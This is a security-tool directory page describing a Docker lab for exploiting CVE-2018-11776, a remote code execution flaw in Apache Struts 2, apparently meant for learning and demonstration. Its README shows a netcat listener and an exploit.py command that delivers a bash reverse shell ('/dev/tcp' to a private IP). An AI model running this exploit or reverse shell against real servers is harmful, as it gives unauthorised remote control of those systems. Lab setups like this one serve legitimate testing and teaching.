Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-11776 — Docker-based environment for exploiting CVE-2018-11776 (Apache Struts 2 RCE) with a Python exploit script and reverse shell demo. | Kitploit
Tools/GitHubGitHub/knqyf263/cve-2018-11776
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubknqyf263/cve-2018-11776

CVE-2018-11776

Docker-based environment for exploiting CVE-2018-11776 (Apache Struts 2 RCE) with a Python exploit script and reverse shell demo.

View Repository
438 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2018-11776

Environment for CVE-2018-11776 / S2-057

Demo

demo

Run server

root@kitploit:~
$ docker run -d --hostname struts2 --name cve-2018-11776 -p 30080:8080 knqyf263/cve-2018-11776

Exploit

root@kitploit:~
$ nc -l 10000 (or nc -lp 10000)
root@kitploit:~
$ python3 exploit.py localhost:30080 'bash -i >& /dev/tcp/192.168.33.1/10000  0>&1'
Download Tool